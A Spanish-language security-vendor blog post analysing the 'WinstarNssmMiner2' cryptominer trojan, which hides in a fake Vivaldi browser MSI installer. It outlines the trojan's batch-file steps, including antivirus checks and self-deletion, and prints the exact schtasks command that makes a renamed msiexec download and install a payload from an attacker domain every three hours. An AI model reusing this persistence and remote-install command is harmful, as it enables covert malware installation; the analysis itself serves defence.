Más de 200000 se han infectado por CryptoMiner “WinstarNssmMiner2”

13/06/2018360TS
Más información sobre el 360 Total Security

Recientemente, 360 Security Center descubrió un Troyano CryptoMiner que se estaba expandiendo activamente. El Troyano se disfraza como una herramienta normal como puede ser el navegador Vivaldi y se distribuye en los instaladores de software. Se recomienda descargar los softwares de los sitios web oficiales en lugar de fuentes desconocidas. Lo hemos llamado “WinstarNssmMiner2” porque tiene el mismo comportamiento que “WinstarNssmMiner”.

Análisis

El instalador del navegador disfrazado se desarrolla con formato MSI y contiene varios archivos batch, archivos zip encriptados y una herramienta de extracción.

1. El Troyano ejecuta u.bat para iniciar la herramienta de extracción para extraer los archivos zip con la contraseña “x12”, y se extraerá un programa nircmd.

2. Ejecuta c.bat para comprobar si hay softwares de antivirus como Kaspersky, ESET o DrWeb instalados. Si hay algún software de antivirus, este finaliza el proceso de msiexec.exe y elimina los archivos del Troyano.

3. Ejecuta nir.bat para iniciar nircmd e inicia i.bat para garantizar los privilegios de administrador.

4. Ejecuta i.bat para añadir una tarea programada. El Troyano duplica su archivos de sistema “msiexec.exe” con un nombre de archivo aleatorio, compone el contenido de la tarea con una URL con la combinación del nombre de dominio “makerstat.info” y un nombre de archivo aleatorio con el sufijo “.exe”. Evita la detección por parte del antivirus mediante la función de descarga de archivos de MSI.

Eejecuta el comando siguiente en la línea de comando:
schtasks /create /tn “TEST-xxx” /tr “‘C:\WINDOWS\System32\3164326753.exe’ /i http://makerstat.info/26753.rar /q” /sc minute /mo 180 /rl highest /f

3164326753.exe es el msiexec.exe renombrado
El contenido de la tarea programada creada:

Actualmente, no se puede acceder a la URL. Parece un elemento de inicio inservible pero es en realidad una fuente de actualización del Troyano. Una vez que la URL está online, la tarea programada ejecuta el troyano para acceder a la URL cada tres horas. Este Troyano MSI tiene el mismo comportamiento que WinsarNssmMiner tal y como hemos analizado antes.

Entonces, instala el navegador Vivaldi finalmente.

En este momento, solo unos pocos antivirus como 360 Total Security han sido capaces de detectar este tipo de troyanos.

Memoro

Hace poco, hemos descubierto que se está extendiendo mucho el malware de CryptoMiner. Recomendamos encarecidamente a los usuarios que habiliten el software antivirus al instalar nuevas aplicaciones. También recomendamos que los usuarios realicen un escaneo de antivirus con 360 Total Security para que eviten ser víctimas de CryptoMiner.

Más información sobre el 360 Total Security